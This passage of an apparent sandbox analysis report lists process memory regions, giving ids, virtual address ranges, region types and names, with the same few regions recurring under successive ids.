name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3925 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 3926 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 3927 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 3928 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 3929 start_va = 0x84b1130000 end_va = 0x84b1154fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 3930 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3949 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 3950 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 3951 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 3952 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 3953 start_va = 0x84b1130000 end_va = 0x84b1154fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 3957 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3961 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 3962 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 3963 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 3964 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 3965 start_va = 0x84b1130000 end_va = 0x84b1154fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 3966 start_va = 0x84b1100000 end_va = 0x84b1124fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 3998 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 3999 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4000 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4001 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4002 start_va = 0x84b1130000 end_va = 0x84b1153fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4003 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4071 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4072 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4073 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4074 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4075 start_va = 0x84b1130000 end_va = 0x84b1153fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4076 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4138 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4139 start_va = 0x84b1100000 end_va = 0x84b1125fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4140 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4141 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4142 start_va = 0x84b1130000 end_va = 0x84b1153fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4143 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4202 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4203 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4204 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4205 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4206 start_va = 0x84b1130000 end_va = 0x84b1152fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4207 start_va = 0x84b1100000 end_va = 0x84b1122fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4255 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4256 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4257 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4258 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4259 start_va = 0x84b1130000 end_va = 0x84b1153fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4260 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4284 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4305 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4306 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4307 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4308 start_va = 0x84b1130000 end_va = 0x84b1152fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4309 start_va = 0x84b1100000 end_va = 0x84b1122fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4349 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4350 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4351 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4352 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4353 start_va = 0x84b1130000 end_va = 0x84b1152fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4354 start_va = 0x84b1100000 end_va = 0x84b1122fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4393 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4394 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4395 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4396 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4397 start_va = 0x84b1130000 end_va = 0x84b1152fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4398 start_va = 0x84b1100000 end_va = 0x84b1122fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4469 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4470 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4471 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4472 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4473 start_va = 0x84b1130000 end_va = 0x84b1152fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4474 start_va = 0x84b1100000 end_va = 0x84b1122fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4522 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4523 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4524 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4525 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4526 start_va = 0x84b1130000 end_va = 0x84b1152fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4549 start_va = 0x84b1100000 end_va = 0x84b1122fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4588 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4589 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4590 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4591 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4592 start_va = 0x84b1130000 end_va = 0x84b1152fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4593 start_va = 0x84b1100000 end_va = 0x84b1122fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4632 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4633 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4634 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4635 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4636 start_va = 0x84b1130000 end_va = 0x84b1152fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4637 start_va = 0x84b1100000 end_va = 0x84b1122fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4676 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4677 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4678 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4679 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4680 start_va = 0x84b1130000 end_va = 0x84b1152fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4681 start_va = 0x84b1100000 end_va = 0x84b1122fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4753 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4754 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4755 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4756 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4757 start_va = 0x84b1130000 end_va = 0x84b1152fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4758 start_va = 0x84b1100000 end_va = 0x84b1122fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4797 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4798 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4799 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4800 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4801 start_va = 0x84b1130000 end_va = 0x84b1152fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4802 start_va = 0x84b1100000 end_va = 0x84b1122fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4860 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4861 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4862 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4863 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4864 start_va = 0x84b1130000 end_va = 0x84b1151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4865 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4866 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4867 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4868 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4869 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4870 start_va = 0x84b1130000 end_va = 0x84b1151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4871 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4872 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4873 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4874 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4875 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4876 start_va = 0x84b1130000 end_va = 0x84b1151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4877 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4887 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4888 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4892 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4893 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4894 start_va = 0x84b1130000 end_va = 0x84b1151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4895 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4896 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4897 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4898 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4899 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4900 start_va = 0x84b1130000 end_va = 0x84b1151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4901 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4904 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4905 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4906 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4907 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4908 start_va = 0x84b1130000 end_va = 0x84b1151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4909 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4919 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4920 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4921 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4922 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4923 start_va = 0x84b1130000 end_va = 0x84b1151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4924 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4929 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4930 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4931 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4932 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4933 start_va = 0x84b1130000 end_va = 0x84b1151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4934 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4935 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4936 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4937 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4938 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4939 start_va = 0x84b1130000 end_va = 0x84b1151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4940 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4950 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4951 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4952 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4953 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4954 start_va = 0x84b1130000 end_va = 0x84b1151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4955 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4956 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4957 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4962 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4963 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4964 start_va = 0x84b1130000 end_va = 0x84b1151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4965 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4975 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4976 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4977 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4978 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4979 start_va = 0x84b1130000 end_va = 0x84b1151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4980 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 4985 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4986 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 4987 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 4988 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 4989 start_va = 0x84b1130000 end_va = 0x84b1151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 4990 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 5000 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5001 start_va = 0x84b1100000 end_va = 0x84b1123fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5002 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 5003 start_va = 0x84b3620000 end_va = 0x84b3e1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b3620000" filename = "" Region: id = 5004 start_va = 0x84b1130000 end_va = 0x84b1151fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1130000" filename = "" Region: id = 5005 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b1100000" filename = "" Region: id = 5019 start_va = 0x84b1100000 end_va = 0x84b110ffff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5020 start_va = 0x84b1100000 end_va = 0x84b1121fff entry_point = 0x0 region_type = private name = "private_0x00000084b1100000" filename = "" Region: id = 5021 start_va = 0x84b2e20000 end_va = 0x84b361ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000084b2e20000" filename = "" Region: id = 5022 start_va = 0x84b3620000 end_va = 